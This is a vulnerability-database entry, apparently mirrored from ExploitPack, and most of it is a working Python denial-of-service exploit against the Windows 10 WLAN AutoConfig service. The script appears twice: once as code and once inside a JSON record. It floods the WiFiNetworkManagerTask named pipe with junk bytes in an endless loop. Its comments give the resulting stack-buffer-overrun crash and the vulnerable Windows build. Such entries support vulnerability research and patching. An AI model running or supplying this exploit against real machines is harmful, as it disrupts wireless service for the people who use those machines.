Search...

Microsoft Windows 10 (x86x64) - WLAN AutoConfig Denial of Service (PoC)

2016-12-06T00:00:00

ID EXPLOITPACK:D3257B50368F5E084D342AEE688ED683
Type exploitpack
Reporter Jeremy Brown
Modified 2016-12-06T00:00:00

Description

Microsoft Windows 10 (x86x64) - WLAN AutoConfig Denial of Service (PoC)

                                        
                                            #!/usr/bin/python
# wlanautoconfig-poc.py
#
# Windows WLAN AutoConfig Named Pipe POC
#
# Jeremy Brown [jbrown3264/gmail]
# Dec 2016
#
# &gt;	wifinetworkmanager.dll!__FatalError(char const *,unsigned # long,char const *, ...)
#	AsyncPipe::ReadCompletedCallback(void)
#	AsyncPipe::Dispatch(int,void *,void *, ...)
#	Synchronizer::EnqueueEvent(...)
#	AsyncPipe::ReadCompletedStatic(...)
#
# --&gt; STATUS_STACK_BUFFER_OVERRUN @ svchost.exe
#
# Tested:
#
# Windows 10 x86/x64 BUILD 10.0.14393 (vulnerable)
# Windows Server 2012 R2 x64 (not vulnerable, service doesn't create pipe)
#
# Dependencies:
#
# pip install pypiwin32
#
# Notes:
#
# This won't kill Wlansvc service, but the thread servicing the pipe will terminate
#

import win32file
import pywintypes
import msvcrt

BUF_SIZE = 4096
PIPE_NAME = r'\\.\pipe\WiFiNetworkManagerTask'

def main():
    try:
        handle = win32file.CreateFile(PIPE_NAME, win32file.GENERIC_WRITE, 0, None, win32file.OPEN_EXISTING, 0, None)
    except Exception:
        print("Error: CreateFile() failed\n")
        return

    fd = msvcrt.open_osfhandle(handle, 0)

    if(fd &lt; 0):
        print("Error: open_osfhandle() failed\n")
        return

    buf = bytearray(b'\x42' * BUF_SIZE)

    # exact number here could vary, keeping it simple
    while True:
        win32file.WriteFile(handle, buf)


if __name__ == "__main__":
    main()

JSON Vulners Source

Initial Source

{"lastseen": "2020-04-01T19:04:33", "references": [], "description": "\nMicrosoft Windows 10 (x86x64) - WLAN AutoConfig Denial of Service (PoC)", "edition": 1, "reporter": "Jeremy Brown", "exploitpack": {"type": "dos", "platform": "windows"}, "published": "2016-12-06T00:00:00", "title": "Microsoft Windows 10 (x86x64) - WLAN AutoConfig Denial of Service (PoC)", "type": "exploitpack", "enchantments": {"dependencies": {"references": [], "modified": "2020-04-01T19:04:33", "rev": 2}, "score": {"value": 0.2, "vector": "NONE", "modified": "2020-04-01T19:04:33", "rev": 2}, "vulnersScore": 0.2}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2016-12-06T00:00:00", "id": "EXPLOITPACK:D3257B50368F5E084D342AEE688ED683", "href": "", "viewCount": 1, "sourceData": "#!/usr/bin/python\n# wlanautoconfig-poc.py\n#\n# Windows WLAN AutoConfig Named Pipe POC\n#\n# Jeremy Brown [jbrown3264/gmail]\n# Dec 2016\n#\n# >\twifinetworkmanager.dll!__FatalError(char const *,unsigned # long,char const *, ...)\n#\tAsyncPipe::ReadCompletedCallback(void)\n#\tAsyncPipe::Dispatch(int,void *,void *, ...)\n#\tSynchronizer::EnqueueEvent(...)\n#\tAsyncPipe::ReadCompletedStatic(...)\n#\n# --> STATUS_STACK_BUFFER_OVERRUN @ svchost.exe\n#\n# Tested:\n#\n# Windows 10 x86/x64 BUILD 10.0.14393 (vulnerable)\n# Windows Server 2012 R2 x64 (not vulnerable, service doesn't create pipe)\n#\n# Dependencies:\n#\n# pip install pypiwin32\n#\n# Notes:\n#\n# This won't kill Wlansvc service, but the thread servicing the pipe will terminate\n#\n\nimport win32file\nimport pywintypes\nimport msvcrt\n\nBUF_SIZE = 4096\nPIPE_NAME = r'\\\\.\\pipe\\WiFiNetworkManagerTask'\n\ndef main():\n try:\n handle = win32file.CreateFile(PIPE_NAME, win32file.GENERIC_WRITE, 0, None, win32file.OPEN_EXISTING, 0, None)\n except Exception:\n print(\"Error: CreateFile() failed\\n\")\n return\n\n fd = msvcrt.open_osfhandle(handle, 0)\n\n if(fd < 0):\n print(\"Error: open_osfhandle() failed\\n\")\n return\n\n buf = bytearray(b'\\x42' * BUF_SIZE)\n\n # exact number here could vary, keeping it simple\n while True:\n win32file.WriteFile(handle, buf)\n\n\nif __name__ == \"__main__\":\n main()", "cvss": {"score": 0.0, "vector": "NONE"}}